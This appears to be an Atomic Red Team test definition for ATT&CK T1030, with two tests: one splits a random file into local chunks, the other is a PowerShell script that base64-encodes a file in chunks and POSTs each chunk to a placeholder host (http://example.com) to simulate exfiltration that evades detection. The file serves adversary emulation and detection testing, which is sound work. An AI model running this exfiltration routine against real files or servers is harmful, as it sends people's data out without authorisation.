
# Atomic test definitions for ATT&CK technique T1030 (Data Transfer Size Limits).
attack_technique: T1030
display_name: Data Transfer Size Limits
# Each list item below defines one test: name, GUID, inputs and executor.
atomic_tests:
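# Stages a file as fixed-size chunks on disk. Nothing is sent off the host: the
# observable activity is `split` running and the chunk files it writes. With
# the default 25,000,000-byte input that is five files (split's default names
# xaa through xae) in folder_path.
- name: Data Transfer Size Limits
  auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
  # 5000000 bytes per chunk is 5 MB (megabytes), not 5 Mb (megabits).
  description: |
    Take a file/directory, split it into 5 MB chunks
  supported_platforms:
  - macos
  - linux
  # Both inputs are substituted into the shell commands below inside double
  # quotes, so a value containing spaces is not word-split. A leading ~ is not
  # expanded inside quotes; pass absolute paths.
  input_arguments:
    file_name:
      description: File name
      type: path
      default: T1030_urandom
    folder_path:
      description: Path where the test creates artifacts
      type: path
      default: /tmp/T1030
  dependency_executor_name: sh
  dependencies:
  - description: The file must exist for the test to run.
    prereq_command: |
      if [ ! -f "#{folder_path}/#{file_name}" ]; then exit 1; else exit 0; fi;
    # The safe_to_delete marker is written only when this step created the
    # folder; cleanup_command uses it to decide whether the folder may be
    # removed. The input file is 25,000,000 random bytes from /dev/urandom.
    get_prereq_command: |
      if [ ! -d "#{folder_path}" ]; then mkdir -p "#{folder_path}"; touch "#{folder_path}/safe_to_delete"; fi
      dd if=/dev/urandom of="#{folder_path}/#{file_name}" bs=25000000 count=1
  executor:
    # `&&` instead of `;`: if the cd fails, split must not run in whatever
    # directory the executor started in.
    command: |
      cd "#{folder_path}" && split -b 5000000 "#{file_name}"
      ls -l "#{folder_path}"
    # Removes the folder only when the marker file is present, i.e. only when
    # the prerequisite step created it. The quoted path keeps rm -rf on a
    # single argument.
    cleanup_command: |
      if [ -f "#{folder_path}/safe_to_delete" ]; then rm -rf "#{folder_path}"; fi;
    name: sh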
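# Reads a file in fixed-size chunks and sends each chunk, base64-encoded, as
# the body of a separate HTTP POST to destination_url. Expected telemetry is a
# run of POST requests from a powershell process to a single destination, all
# but the last carrying a body of the same size.
- name: Network-Based Data Transfer in Small Chunks
  auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
  description: "Simulate transferring data over a network in small chunks to evade detection."
  supported_platforms:
  - windows
  input_arguments:
    source_file_path:
      description: "Path to the source file to transfer."
      type: path
      # Placeholder, not a usable path: the caller has to supply a real file.
      # NOTE(review): there is no dependencies block, so nothing checks that
      # the file exists before the command runs.
      default: "[User specified]"
    destination_url:
      description: "URL of the destination server."
      type: url
      # The default is a public placeholder host reached over cleartext HTTP.
      # Set this to a listener inside the test environment so the contents of
      # the source file stay there.
      default: "http://example.com"
    chunk_size:
      description: "Size of each data chunk (in KB)."
      type: integer
      default: 1024
  executor:
    name: powershell
    elevation_required: false
    # source_file_path and destination_url are substituted inside double
    # quotes. Unquoted, a path such as C:\dir\file is not a valid PowerShell
    # expression inside OpenRead(...), and a URL containing & or ; would be
    # split by the parser. chunk_size stays unquoted because it is used as a
    # number (1KB is 1024 bytes in PowerShell).
    command: |
      $file = [System.IO.File]::OpenRead("#{source_file_path}")
      $chunkSize = #{chunk_size} * 1KB
      $buffer = New-Object Byte[] $chunkSize
      while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
        $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
        Invoke-WebRequest -Uri "#{destination_url}" -Method Post -Body $encodedChunk
      }
      $file.Close()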